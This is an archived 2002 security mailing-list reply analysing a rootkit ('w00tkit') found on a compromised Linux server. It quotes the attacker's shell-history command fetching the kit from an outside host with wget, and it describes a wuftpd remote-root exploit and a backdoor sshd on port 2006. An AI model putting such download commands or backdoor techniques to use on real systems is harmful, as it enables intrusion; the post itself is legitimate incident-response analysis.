On Wed, Sep 11, 2002 at 08:15:42PM -0700, Ver Allan Sumabat wrote: > 21 - wu-ftpd-2.6.1-20 > 22 - openssh-3.1 > 443 - tomcat-3.2.4 > > 1. this is the content of /home/war's .bash_history: > > wget http://mrunix.free.fr/roy/w00tkit.tgz There we go. getting the kit and grepping through the binaries reveals: 7350wurm:^@^@^@^@7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) wus:^@2.6.0^@aw+^@wus.log^@^@^@wu-scan by yonezet (yonezetat_private) Since the Attackers probably used the same rootkit to crack your machine wuftpd was the Target. (No ssh exploit in the w00tkit Pkg, afaics; but it seems to open another ssh at port 2006, it seems.) Also, the tgz contains even a core file: core: ELF 32-bit LSB core file Intel 80386, version 1 (SYSV), SVR4-style, from 'pstree' The core file points out that the Machine (which threw the Core, not yours) had several Processes running, including various Bouncers (IRC Proxys), atleast on eggdrop (IRC Bot) and various scan Programs. Another Fact is, that the other sshd (2006) has a static sshd_random_seed File. I wonder if one can use that to fingerprint hacked machines. I did do a fast grep over the Files only, though, so one might find more interesting Things. -rico ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Sep 13 2002 - 11:26:40 PDT